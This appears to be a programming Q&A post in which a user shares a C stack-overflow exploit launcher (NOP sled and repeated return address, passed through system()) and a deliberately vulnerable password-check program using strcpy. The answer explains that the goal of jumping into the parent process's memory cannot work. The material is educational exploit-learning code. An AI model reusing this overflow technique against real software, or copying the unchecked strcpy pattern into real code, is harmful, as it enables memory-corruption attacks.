Reputation: 751
How to access address space of parent process from child process?
I am executing a program B from the main function of another program A by C library function system(). But when I am passing an address of the A to the B as an argument to replace the return address in the process B by buffer overflow, it is showing segmentation fault.
I know each process cannot access address space of another process. But is there any way I can buffer overflow the child process so that execution returns to the parent process? I am using x64 bit machine and gcc with -m32, -fno-stack-protector options.
This is the program A from where I am executing another program B:
int main(int argc, char *argv[]) {
unsigned int i, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // zero out the new memory
strcpy(command, "./child \'"); // start command buffer
buffer = command + strlen(command); // set buffer at the end
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // set return address
for(i=0; i < 160; i+=4) // fill buffer with return address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // add NOP instructions
strcat(command, "\'");
system(command); // run another program
free(command);
}
And this is the other program B which is vulnerable to buffer overflow
int testAuthenetication(char *password){
int value = 0;
char buffer[8];
strcpy(buffer, password);
if(strcmp(buffer, "abcd") == 0){
value = 1;
}
if(strcmp(buffer, "abcdef") == 0){
value = 1;
}
return value;
}
int main(int argc, char *argv[]){
if(argc < 2){
printf("Enter the password \n");
return 0;
}
if(testAuthenetication(argv[1])){
printf("Access Granted \n");
}
else{
printf("Access denied \n");
}
return 0;
}
Upvotes: 0
Views: 329
Answers (1)
Reputation: 382532
"so that execution returns to the parent process": I don't see how this is possible. The instructions of the parent process are in another memory space (different page tables selected by the kernel through CR3), so if you try to jump to the address of the parent from the child, there will be trash / invalid pages there.
I recommend that you state the context / end goal more clearly: are you trying to do arbitrary code execution from an overflow is that it? And B is the vulnerable program, and A the exploit code?
If that is the case, try to write the arbitrary code to an executable portion of the memory of the child process, and then use the overflow to jump to it, all in the child process itself. I am not sure if this will work.
The Y of this X has been asked less precisely at: How are buffer overflows used to exploit computers? (but not of the answers currently give a minimal example).
Upvotes: 1
Related Questions
- Node / Express: EADDRINUSE, Address already in use - how can I stop the process using the port?
- How can I measure the actual memory usage of an application or process?
- Is it possible to iterate over arguments in variadic macros?
- The art of exploitation - exploit_notesearch.c
- How to determine CPU and memory consumption from inside a process
- How do I get the application exit code from a Windows command line?
- Stack based buffer overflow - return address of "shell code"
- Which return address am I corrupting?
- Weird execution path caused by stack buffer overflow